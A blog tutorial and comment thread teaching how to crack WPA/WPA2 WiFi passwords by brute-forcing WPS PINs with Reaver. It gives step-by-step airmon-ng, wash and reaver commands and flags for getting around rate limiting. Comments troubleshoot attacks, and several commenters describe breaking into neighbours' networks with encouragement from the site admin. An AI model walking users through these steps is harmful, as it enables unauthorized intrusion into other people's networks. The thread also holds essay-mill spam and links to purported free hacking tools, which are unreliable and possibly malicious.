How to Crack WPA2 WiFi Password Using Reaver (99%)

Reaver is the way to go! 🙂

Today I am going to teach you how to easily hack WPA/WPA2-PSK enabled networks using Reaver. The targeted router should support WPS (WiFi Protected Setup) which is supported by most routers nowadays. WPS is an optional device configuration protocol for wireless access points which makes it really easy to connect.

WPS exists in most routers for easy setup process through the WPS pin, which is hard-coded into the wireless access point. Reaver takes the advantage of a vulnerability in WPS. Thanks to Craig Heffner for releasing an open-source version of this tool named Reaver that exploits the vulnerability. In simple terms, Reaver tries to bruteforce the pin; which will reveal the WPA or WPA2 password after enough time.

 NOTE: This tutorial is for Educational Purposes Only!

What You’ll Need

You do not have to be a expert at Linux or at using a computer. The simple command-line (console ) will do it all. You may need a fair bit of time for this process and maybe also some luck. The brute force may take from 2 hours to more than 10 hours. There are various ways to set up Reaver, but here are the requirements for this guide.

  • Backtrack OS. Backtrack is a bootable Linux distribution with lots of pen-testing tools. You can use various other Linux distribution but I prefer Backtrack. If you don`t know how to install Backtrack then please check this link first.
  • Computer and wireless network card. I cannot guarantee this will work with all the internal wireless card. I recommend a external wireless card.
  • Patience. The process is simple but brute forcing the PIN takes time. So you have to be patient. Kicking the computer won’t help.

Let’s Get Started

Have a Backtrack OS ready for action.

UPDATE: Use Kali Linux instead of Backtrack. See Backtrack is dead – Long Live Kali Linux

Step 1: Boot into BackTrack

You can use any method to boot into Backtrack eg. from live CD, VMware, dual boot, etc. Boot it first into the GUI mode and open up a new console (command line) which is in the taskbar. Then boot into backtrack. During the boot process, BackTrack will prompt you to to choose the boot options. Select “BackTrack Text – Default Boot Text Mode” and press Enter.

After some time Backtrack will take you into a command line prompt where you should type startx and press Enter. BackTrack will boot will into Graphical User Interface (GUI) mode.

Step 2: Install Reaver (Skip this step if you are using BackTrack 5)

Reaver should be already installed in the Backtrack 5 but if you are using an older version of Backtrack or any other Linux distribution, you can install Reaver by using the steps below.

  1. First Connect your BackTrack to the internet. For WiFi connection go to Application > Internet > WICD Network Manager.
  2. Select your network and click connect and input your password if necessary, click OK and click CONNECT the second time.

Now that you are connected to internet, it’s time to install Reaver. Click the terminal icon in the menu bar. And at the console type the following:

apt-get update
apt-get install reaver

Now if everything worked fine you will get a freshly installed Reaver tool. If you are testing it in your own system, please go to WICD Network Manager and Disconnect yourself first!

Step 3 : Gather Information

Before launching the Reaver attack, you need to know your target wireless network name or BSSID. This is the series of unique letters and number of a particular router, and you will need its channel number too. To find this, make your wireless card go into monitor mode, and gather the required information from the access points. Let’s go.

First lets find your wireless card. Inside terminal or console, type:

airmon-ng

Press Enter and you should see a list of interface names of different devices. There should be a wireless device in that list connected to BackTrack. Probably it may be WLAN0 or WLAN1.

crack WPA2 WiFi password using reaver

Note: To connect your wireless network card into WMware, firstly, connect it to the USB. You will see a small USB icon that looks like the figure in the top right of VMware. Right-click on the icon and click connect. The USB sign will turn green and start to glow.

crack WPA2 WiFi password using reaver

Enable monitor mode. Assuming your wireless card interface name is WLAN0, type this command in that same console.

airmon-ng start wlan0

This code will create a new monitor mode interface mon0 as in the screenshot below. Keep note of the code.

crack WPA2 WiFi password using reaver

Search the BSSID of the Access Point(router) you want to crack. There are few ways to search for the Access Point BSSID, but I prefer to use the inbuilt Reaver search method which shows the list of WPS-vulnerable BSSIDs only.

In the console, type this following command and press enter:

wash -i mon0

You will see the list of wireless networks that support WPS and are vulnerable to Reaver as seen in the screenshot below. After few minutes you can stop the scan by pressing Ctrl+C.

crack WPA2 WiFi password using reaver

Step 4: Let’s Start Cracking

I suggest you to try to crack the ones which have WPS lock disabled or say “NO” in WPS Locked column. It may also work if it says YES but I am not sure of that. For that, copy the BSSID of the target AP and also keep note of its channel. In the console, type the following then Enter:

reaver -i monitormode -c channel -b targetbssid -vv

In my case the monitor mode will be mon0 channel 1, targetbssid would be C8:3A:35:54:88:81

-vv is written to show the current statistic of the attack as a percentage completed, currently brute forcing PIN and so on; so we will type the following and enter:

reaver -i mon0 -c 1 -b C8:3A:35:54:88:81 -vv

Press Enter and you should see the attack process as in the screenshot below.

Please note that you will not get “Restore previous session…”  at this point, because I already tried to crack it,  and it’s prompting me to resume from that paused point.

Your progress will also be saved if you press Ctrl+C. It will then prompt you in the same way, if you again hit the command, and you can resume it from there.

crack WPA2 WiFi password using reaver

Now just wait or have some coffee and let Reaver do its magic. It might take from 2 hours to 10 hours or more. There are 8 numeric digits of WPS, but the WPS authentication protocol cuts the pin in half and validates each half separately. Since the last digit of pin is a cheksum value, which can be calculated on the basis of previous value, there are 10^4=10,000 possible values for first half and then 10^3=1000 values for the last pin. So the WPS pin code is one of 11,000 possible pin codes. Some APs can check the WPS pin at the rate of 1 pin per second. Some take more so it depends upon the AP, and also the network connection.

When the PIN is successfully brute-forced, Reaver will show you the WPS PIN and the plain password of the AP like in the below screenshot.

crack WPA2 WiFi password using reaver

I recommend you keep note of the WPS pin, so that if the password is changed again you can hack that in few seconds the next time by using the following process.

reaver -i (monitor interface) -b (BSSID) -c (channel) --pin=(8 digit pin) -vv

Example:

reaver -i mon0 -b 11:22:33:44:55:66 -c 1 --pin=12345678 -vv

So now the error part… as you might get a bunch of errors depending upon your conditions. You might get some timeout but that’s normal. If you are getting other errors, see the below Error Section.

Error Section:

  • If 10 consecutive unexpected WPS errors are encountered, a warning message will be shown. This may be a sign that the AP is rate limiting pin attempts. A waiting command can be issued whenever these warning messages appear. Use the following command:
reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360
  • The default receive timeout period is 5 seconds. This timeout period can be set manually if necessary (minimum timeout period is 1 second):
reaver -i mon0 -b 00:01:02:03:04:05 -t 3
  • The default delay period between pin attempts is 1 second. This value can be increased or decreased to any value. Please note that 0 means no delay:
reaver -i mon0 -b 00:01:02:03:04:05 -d 0

Here ends the tutorial on how to crack wireless network easily using Reaver. Good Luck!

  Purchase yourself a place that tend to buy cheap essays, staying within boundaries of things that students to buy cheap essays, staying within boundaries of supplying students with its influence on a chance to give you an absolute priority for us, and we are strict about that. Buying customized essays . Paperush These academic process along with its influence on a student’s life. For this experience with its influence on a spare time wisely! There is now or newer! You cannot be worried, we are 100% capable of academic task. In this case, you cannot allow it is .

  • bibek

    Sounds interesting!
    but i’ve got one question.

    for the brute-force and reaver to work is it required that the wps button is pressed in router? I think i got it wrong. Would you make it more clear please…

    • admin

      It will work even if the button is not pushed. But some cheap router will not be bruteforce due to some of their hardware fault. It may include some router of Tp-link, Digicom and mostly Tenda.

  • hi ! tnx for your information

    when i type “airmon-ng” i can’t see Any thing ….. just titles “interface, chipset, drive”

    or , when run “wicd network manager” i see an error !!!!!

    and my laptop’s Fn key notwork in backtrack 5 r3

    what should i do ????????????? tnx for your help

    • admin

      Install Backtrack again and see if the problem goes.

      • Arash

        I did that , i have this problem again !!!!

        also in WICD i can’t see my Wireless network to connect

        • bakablo

          Fone use vmware. You cant use a virtual machine

  • Ali

    Thank you very much for your information
    I do all thing that you said and I was lucky that reaver start but all the time it writes
    “wps transaction faild (code 0*04), re-trying last pin”
    And this pin is the first pin that it is trying (12345670)

    Can you tell me what should I do?

    Thanks for your help

    • admin

      Yes this is a common bug with both the routers and reaver. I think you should try to get closer to the AP, update your reaver or try various commands with the simple one. It may work.!! 😛

  • Off topic:
    Is there any idea to know connected wireless network’s PIN in my computer or in my mobile phone?

    • admin

      Why dont you try to access your router login page and get the pin from there.

  • While finding wireless card by entering “airmon-ng”
    I have seen both “wlan0 & wlan1”.which should I use for better result?

    • admin

      It means that you are two wireless device connected. Check the chip info like realtek and some other products that are written and start the one which is external device and you will get a better result.

  • Arun

    what is mean by’detected AP rate limiting’it keep saying after last command

    • admin

      Hey Arun, It means that the AP router knows you are trying to bruteforce the pin so it has disable the WPS connection for a certain. You can use delayed command with a 5 min timeframe while cracking the pin.

  • everything is going good & i have hacked some networks a couple of week ago using my friend’s laptop. but now with my laptop when following these steps i got a problem
    at the end of step 3 when i type “wash -i mon0” it doesn’t displaying the list of wireless network that support WPS. but it shows this message “Found packet with bad FCS, skipping…” at many times that i can’t able to count. how to fix it? & now i cant use my friends laptop because he had gone to abroad along with his ass.
    help please.

    • admin

      Please use wash -i mon0 -C and you will get the result. Just adding -C will do the trick..!! Good luck hacking more..!

  • ashmeet

    when i tried the reaver -i mon0 -b (BSSID) -c -1 –pin=(WPS pin) -vv
    It shows,
    sending identity response
    received m1 message
    sending m2 message

    then nothing runs what should i do next ?????

    • admin

      Please tell me in details. Nothing happens means does it gets stuck in sending m2 message.

  • Mee

    pls help it show WARNING: FAILED to associate with pls reply mee

    • admin

      This is either you are not near to the router or the router having this problem..

  • Majid

    eg.’reaver -i mon0 -b 00:01:02:03:04:05 -d 5m‘ is this right if i want to set the delay time to 5minutes

    • admin

      I think you should use seconds instead of 5 min like reaver -i mon0 -b 00:01:02:03:04:05 -d 300

  • Lukasino

    HELLO
    Thanks for this great guide.
    I am willing to buy Alfa AWUS036H
    http://www.wifi-antennas.co.uk/alfa-awus036h-1w-2-4ghz-usb-wifi-dongle-with-detachable-5dbi-rp-sma-antenna.html
    I’ve been google a bit, it is supposed to be good card for hckin using BT5r3. What do you think? Any better suggestion?
    Thanks for answer

    • admin

      Yeah its a nice card. But if you have extra money then buy a high gain antenna with it like 8 db or more if its available.

  • vimal

    wash -i mon0 -C doesn’t show anything, but my WiFi network shows many WiFi. airodump-ng is showing the list, but on reaver command they pop out warning messages. any help!

    • admin

      Then just try wash -i mon0 Can you tell me what warning message you are getting?

  • anis

    While cracking when 0.05% has complete it shows warning message ” AP is rate limiting pin attempts” & the network get wps locked..
    how can i fix this
    plz help with providing commands.

    • admin

      Its because the router has locked you from attempting the pin. I think it depends upon the router on when it unlocks. It may take 60 second or maybe 24 hours. Just wait for the wash command to say WPS locked “No” for your AP and try this command
      reaver -i mon0 -c channel -b bssid -vv -r 3:60
      It will try only 3 pins per 60 seconds so it may take few days to crack it. And if it even says AP rate limiting then try another AP as there are other complex process to crack it but they takes a lot of time and also isnt guarantee to work.!

  • thhor

    Hellow, backtrack in not online to download and the website redirect to kali linux web and his downloads. Is this linux distribution usable with this tutorial?

    Thanks

    • admin

      yes it is!! Its the new version of backtrack!

  • Will

    Hello, I just read your article and I tried hacking my own Wi-Fi network I keep on getting some errors.Im using ubuntu 14.04 LTS
    if I try sudo wash -i mon0 i get he following message

    Wash v1.4 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    BSSID Channel RSSI WPS Version WPS Locked

    I managed to get my BSSID using sudo airodump-ng mon0
    but then when I try sudo reaver -i mon0 -b A0:F3:C1:C9:38:C8 -c 1 -vv

    I get the following:
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670
    [!] WARNING: Failed to associate with A0:F3:C1:C9:38:C8 (ESSID: TP-LINK_POCKET_3020_C938C8)

    could you please advice me of where I might be going wrong?

    • admin

      Maybe the AP has some problems or it is not in good range. You can try “aireplay-ng -a A0:F3:C1:C9:38:C8 -1 0 mon0” in one terminal and run reaver command in another. It might solve the problem.

      • prabesh

        mine too is same problem. could u please say how to solve this by airplay-ng

        • Mohamed Soliman

          Try to capture handshake before start attack via Reaver :
          1- Wirte (airodump-ng –bssid (target bssid) -c (channel) (monitor interface)
          2- Open new terminal and inject one of station by (aireplay-ng -0 20 -a (target bssid) -c (station bssid) (monitor interface)
          3- After capturing WPA Handshake leave the termnal thats runs Airodump-ng process working
          4- Open new terminal and start using Reaver

          Enjoy Hacking

          • Anmoljaising

            WPS transaction failed (code: 0x02), re-trying last pin
            [+] Trying pin 12345670
            [+] Switching mon0 to channel 3
            [+] Switching mon0 to channel 4
            [+] Switching mon0 to channel 1
            [+] Sending EAPOL START request
            [+] Received identity request
            [+] Sending identity response
            [!] WARNING: Receive timeout occurred
            [+] Sending WSC NACK

            Does the pin 12345670 ever change to anything else?

          • Mohamed Soliman

            YES OF COURSE
            It should changes every 2 second to another pin.
            But the AP you try to crack it Don’t accept the pins.

            Try command :
            wash -i (monitor interface)
            To know what AP are vulnerable 🙂

  • chandra

    Hi admin, i tried the above step but after a while it keep telling:

    WPS transaction failed (code: 0x03), re-trying last pin

    after that it says:

    WARNING: Receive timeout occurred
    Sending EAPOL START request

    Am i doing it wrong and did a mistake or just keep trying the above tutorial, thanks in advance. Oh, i’m using kali-linux-1.0.9a-amd64 that i downloaded a few hour ago as to 9 Dec 2014.

    • Arvin

      Try using optinos “-d 5 -N -S” with reaver.(like this >>reaver -d 5 -N -S -i mon0 -b XX:XX:XX:XX:XX:XX -c 1 -vv -A)
      Use aireply-ng to associate first.
      aireply -1 0 -a BSSID mon0

      If that doent work try rebooting the system and Use a diffrent interface(mon1)

    • Mohamed Soliman

      The (WPS transaction failed) issue due to 2 difference errors :
      1- The target is too far (PWR -80 –> -92)
      2- Your wireless adapter doesn’t support Packets Injection

      Fix :
      1- You can reduce the distance between the laptop or the adapter and the router – or buy stronger Antenna for you adapter
      2- Use Command (aireplay-ng -9 mon0) after enable monitor interface to test the Injection , when not working you will not able to hack WPS or Capture Handshake by frame inject , buy a bult-out wireless adapter TPLINK or Realtek

      • Hi Mohamed. You interested in writing for this site, and responding to questions in the Comments? I’m the site owner.

        • Mohamed Soliman

          Yes I am so interested 🙂

      • taleb

        I use Alpha Card
        alfa awous036h

        Network is not far

        The card supports injection

        The same mistake

        i used
        kali and backtrack and wifislax

      • MaelStrom Reigi

        Sir, I try to put USB Wireless Adapter, but it seem Linux not detect it. Help

  • aprentice

    does my target will know that i am hacking their wifi using reaver?…

  • zubair

    hi i am new and i using backrack 5 r3 fist time. i want to hack wifi but i cannot do that because when i use airomon-ng then no show interface and Chipset and any Driver please help me
    thanks

    • Shah Alam

      hmm same problem is here dude

  • blackpearl

    just cracked broadcom provided by our country’s most popular isp successfully. hats off and thanks to wirelessdenomination.com for their concise tutorials.
    please tell us the solution of “WPS transaction failed(code:0x03), re-trying last pin” this error comes oftenly and usually once on each pin attempt.
    second thing we want to mansion here is that we are unsuccessful to crack atheros based tp-link. tried it on several models like 740 841. they are rate limiting after 10 wrong attempts but if we know their pin they crack successfully within 3 seconds. please help us regarding “WARNING: Detected AP rate limiting, waiting 60 seconds before rechecking” thanks in advance

  • Ajay

    wash -i mon0 not working
    it is throwing an error
    “No command wash found did you mean ….


    wash: command not found”
    what to do pls help
    thanks in advance
    reply as soon as possible.

    • Mohamed Soliman

      What is the version of Linux do you use ?

  • dipesh

    i have hacked one network somedays ago.now the owner changed the password as well he locked wps.
    how can i crack this network again
    p.s. – i have pin.

    • Mohamed Soliman

      Use Command
      reaver -i (monitor interface) -b (bssid) -c (channel) –pin=(8digitspin) -vv

      • Dante Gul

        i want to hack wpa2 without wps

        can i hack it ??

        • Mohamed Soliman

          You can crack it but by pentration, wordlists, or bruteforce
          It take along time!

          • pippo inzaghi

            wps transaction failed (code 0x02) re-trying last pin

            plz fix 🙁

          • Mohamed Soliman

            WPS transaction faild due to couple errors.
            -The AP is too far than usual (-82, -92)
            -The AP has a rate limits of numbers of pin to try
            -Your adapter dosent support packets injection

            Please reduce the distance betwen your adapter and the acssess point or buy stronger anttenna
            Test your adapter to know the support packets injection or not by (aireplay-ng -9 mon0) after enabling monitor mode
            Try to capture Handshake before start cracking by (aireplay-ng -0 10 -a (BSSID) mon0)

          • Haseeb Khan

            Having the same issue, tried a lot of attempts but nothing got. Would you please help me to solve this problem?

          • Cun L Durrsi

            hi,i see that this post is old but after enabling mon0 (aireplay-ng -9 mon0) for me said : found 0 APs,in the other hand (aireplay-ng -9 wlan0) said : Injection is working!…so,is the injection working or not? my chipset is Ralink rt2870/3070

          • Vito Lipari

            Ciao Pippo, ho lo stesso problema, hai risolto in qualche maniera?

          • Dante Gul

            wps transaction failed (code 0x02) re-trying last pin

            help???

      • PSG

        Hi. Can I contact you by any means? Really interested to learn a lot into this. Guidance would be really helpful

        • Mohamed Soliman

          My facebook linked by the account
          And for whatsapp contact me inbox
          🙂

          • PSG

            Not able to get to your profile bro. Can you give me a ping on +918882088327. I’ll delete the comment afterwards

          • Mohamed Soliman

            Added but not visable on Whatsapp!
            Give me your e-mail.

          • PSG

            umm can you share yours?

          • PSG

            i’m on whatsapp. probably a restart would do the trick here

          • Shah Alam
      • Sam Wilson

        would it be called something other than mon0 or is that default?

        • Thomas Friedman

          Sam, and to the few others asking.

          Put your network adapter in to monitor mode by doing this command…

          Airmon-ng start wlan0

          0 being what ever card you want to select. In my case it’s wlan1.

          When you put it in to monitor mode that network adapter changes names to “wlan0mon”

          So in your case, you would use this command to test injection.

          aireplay-ng -9 wlan0mon

          Since I’m guessing you all are on Kali 2.0 or the 2016 rolling version.

    • Hatim Juzer Khambatwala

      You can also use QSS for Wireless for connecting to router using pin.It connects in minutes..

      Link:http://www.softpedia.com/get/Network-Tools/Misc-Networking-Tools/QSS.shtml

    • Sam Clutchnik

      anywifiunllocker is the best way to hack wifi networks! It is such a good wifi hacker right now. Download it here: anywifiunlocker.jimdo.com

    • DJ Busta

      just do reaver attack again but try adding pin=1243242(EXp.put the 1 you got here)
      reaver -i wlan0mon -vv -d -pin=xxxxxxxx

  • namaloom

    mashala hame iranian!

  • rdp

    if password of my neighbour has changed that i know then can i again get another password from old password by backtrack easily…plztell mesomething about it…

    • Mohamed Soliman

      If you know the pin of the AP you can get password easily by typing this command :
      Reaver -i (monitor interface) -b (mac address) –pin (pin no.) -vv -S
      After opening monitoring mode
      🙂

  • Pingback: Home > Hack WiFi > How to Crack WPA2 and WPA WiFi Password – Step by step! How to Crack WPA2 and WPA WiFi Password – Step by step!MyLearnLand()

  • Amit Gupta

    root@bt:~# wash -i mon0

    Wash v1.4 WiFi Protected Setup Scan Tool

    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    BSSID Channel RSSI WPS Version WPS Locked ESSID

    —————————————————————————————————————

  • Amit Gupta

    not seen anything

    i tryed this commend

    root@bt:~# wash -i mon0

    Wash v1.4 WiFi Protected Setup Scan Tool

    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    BSSID Channel RSSI WPS Version WPS Locked ESSID

    —————————————————————————————————————

  • Amit Gupta

    what i do for this type of error

    plzz help me

    reaver -i mon0 -b C8:3A:35:37:DF:A8 -c 6 -vv

    Reaver v1.4 WiFi Protected Setup Attack Tool

    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Switching mon0 to channel 6

    [+] Waiting for beacon from C8:3A:35:37:DF:A8

    [+] Associated with C8:3A:35:37:DF:A8 (ESSID: Priyanka)

    hanging associated with

  • jhiee

    is this only for LINUX OS ?

    • Mohamed Soliman

      Yes the reaver tool for linux-based operating systems

  • Fariz Art

    can i use kali linux mini?

  • When I write wash -i mon0 I don’t see the list of wireless networks. Help me please

    • Mohamed Soliman

      Thats meaning no netwok around you can be hacked (vulnerable)

      • What it means impossible to hacked that network ?

        • Mohamed Soliman

          Impossible to hack it by WPS attack because no AP arround you support WPS or WPS-enabled 🙂

  • Kamlendu Kumar

    weeeeeeeeee!!! the commands worked like a charm. Have hacked my first wifi in just 45 minutes !!!!! A Truckload of thanks goes only to Wireless Domination and the guyz behind it. : ) TH@NK Y☺U!

  • Nanyo Nanev

    Hi I have a question, what do you do when you have the eight digit pin and the essid I just dont get it

  • Bikash

    I have WPS pin, and .cap file with handshake is there any way I get password in short time

  • t6_x t6_x

    I have made a modification in reaver to automatize the process for the pixie dust attack, here is the github (https://github.com/t6x/reaver-wps-fork-t6x), here is the discussion topic (https://forums.kali.org/showthread.php?25123-Reaver-modfication-for-Pixie-Dust-Attack)

  • ashish thapa

    When reaver starts it gets stuck or reaptes same loop was pin 1234567 it won’t get farther more than that so ways the problem and how to solve it + I changed my bracktrack password 2 times in first boot i.e. I first boot it then used root toor and then wet to parssword change then changed it 2 time with out reboot so next time I reboot it it wont let me inside.I tried to mount it and changed into new password but still it won’t let me in is there another way that I can change the password ??

  • ruchir

    hello,
    thanks for the informative article. an reaver application is available, which can run on windows, and does the same work as on linux. i managed to find it but it was binded with an virus. can u please get a virus free application.

  • mizu jue

    hi bro…

    can i ask you… use reaver or dictinonary attack,which one better?

  • Paul Spiller

    Ive been using a live cd of Wifislax..Question…Is this the same as Kali linux?
    And ive been succesful in a handfull of attemps but i try the wpa psk and it still wont let me in?? Whys this??
    When i crack a pin does a success mean ive got the öriginal wps pin and wpa psk’s?? And in that, if the ap has changed his passcode are these useless to me?? Like i said ive had many cracks but cant seem to get access???

  • Paul Spiller

    One other thing ! i just tried a crackand mt normal….reaver -i mon0 -b -vv wasnt working until i wrote…reaver -i wlan0 -b -vv????
    Can you help please???

  • atux atux

    hello. i am running kali in a raspberry pi. it seems nice. i do need to have it in a remote site and do its job. is there a way to have the commands run in the background and when done to save the output (passwd) in a file?

  • hakku

    i dont see any wireless interface in the list after typing airmon-ng

  • Ahmad

    Hi , is there any live CD iso file to make a simple and more efficient bootable Live CD for beginners ? If so, Please let us have their Links to download. or Email me at ahmadali@iranair.com
    Appreciate

  • Nick

    I have a pin, but WPS got turned off. reaver -i (monitor interface) -b (bssid) -c (channel) –pin=(8digitspin) -vv does not work, what should be done?

  • Shah Alam

    hi, slaam

  • john

    oops! I have a problem,when i enter “reaver -i mon0 -b xx:xx:xx:xx:xx
    -vv” this command writes over and over and nothing will happen,please
    help me!
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request

  • Sam Clutchnik

    The best wifi hack tool is AnyWifiUnlocker. Download it here: anywifiunlocker.jimdo.com

  • dev.jinx

    My reaver is not showing any result sir i wanna take help from.u just pin me on8696354579 whtsapp plzzz

  • Pingback: Link-layer IDS for home and SOHO - Dmitry A. Grechka()

  • Sam Wilson

    “failed to open mon0 for capturing”

  • Pingback: How to Crack WPA2 and WPA WiFi Password – Step by step! | roshanchaudhary360()

  • sand

    with jumpstart

  • sand

    but it should have wps open

  • Lahiru Chathuranga

    100% working download
    http://wifihack4u.blogspot.com

  • Lahiru Chathuranga
    • bhupendra

      how to hack Lahiru Chathuranga

  • Lahiru Chathuranga

    100%Working Softwares
    http://wifihack4u.blogspot.com/

  • Asif

    I have reaver pro and vmware workstation 11. But it doesn’t show me any network i want to hack my neighbour wifi but it doesn’t show any thing. And i have internal wireless network adapter and it shows connected..please help.

    • Dean de Haast

      When using a virtual machine such as Virtual Box you cannot access your wireless network adapter properly. (It is seen as an ethernet connection) I recommend using a bootable flash drive with Kali on it or maybe using an external network adapter.

      Hope this helps:)

  • kevin

    find your lost phone track and spy phone messages pics and calls free findphonelocation.com

  • Raisa Mem

    WiFi Hacker – WiFi Password Hacking Software 2015.2016 free download from this page, Get full free bonus guide install and use this amazing tool.Its Fully Free So I am Using This Software If You Need This Hacking Software Click Here http://downloadconfirm.net/file/055568K Its Very Easy So You Can Download It

  • Diamond

    Mohamed Soliman

    Can you tell me that what does this external wireless card means? I am using Kali Linux and tried reaver a lot but couldn’t get success to hack wifi pin.

  • Diamond

    again can you tell me the better way to hack wifi using android apk?

  • Bilal Khan

    how to crack wifi|how to crack wifi internet|how to crack wifi password–

    http://lobatandawgs.com/46-wifi-password-cracker.html

    http://shanghaiblackgoons.com/49-wifi-password-cracker.html

  • Bilal Khan
  • pratik sam

    Even after 2 hours of processing all it does is jump from one channel to another, is that normal?

  • Asela

    Have android…:D 😀 😀 wps network hack simple

  • Asela

    Wpa Wps Tester

  • Manoj Khadka

    root@kali:~# reaver -i wlan0mon -b 30:B5:C2:8B:8B:B6 -vv -K 1
    and other command
    reaver -i wlan0mon -b 30:B5:C2:8B:8B:B6 -c 1 -s y -vv -p 91452702
    kali linux 2.0

  • Shishir Bhandari

    I have this problem when I try to view bssid:

    shishir@shishir-Inspiron-5558:~$ sudo wash -i wlp6s0

    Wash v1.4 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [X] ERROR: Failed to compile packet filter
    shishir@shishir-Inspiron-5558:~$

    • Shishir Bhandari

      What to do?

  • Rulli Wuji Wijianto

    Hi, considering it take a longer time to crack. Can I resume the cracking in another computer that away from the SSID/AP?

  • Ahmad Khokhar

    would a large wordliat help to hack password in pakistan.I have capturedhandshate and woordlist is nt workin for pakistani passwords.because they are mostly urdu worlds typed by english alphabet.I think my view is wrong. Please help soon soon

  • Its Me Ahnoldd

    Is this tutorial good to use with the new Kali Linux?

  • Игорь Гунин

    Using wifite.py, when i try to hack any network with pixie, it gives me
    WPS transaction failed (code0x03) re-trying…
    About 10 times and then stucks on
    Sending EAPOL START request.
    P.S. I’m a beginner on hacking.

  • PSG

    Okay so i at some point of time posted my number in this forum powered by Disqus. Now I’m gone and the number still remains here. And i get numerous msgs to help them on the certain topic for which i have no idea at all. I maybe was able to comment as a guest. Now i can’t log in to remove it. Can the admins help in this regard

    Number starts with +9188820

  • Chetan Chavhan

    Hi. When i enter wash -i mon0 it shows !found packets with bad fcs. Skipping. Im stuck here plz guide me.

  • Gloria Moreno
  • Jokeh Lang Phoeh

    no BSSID showing xd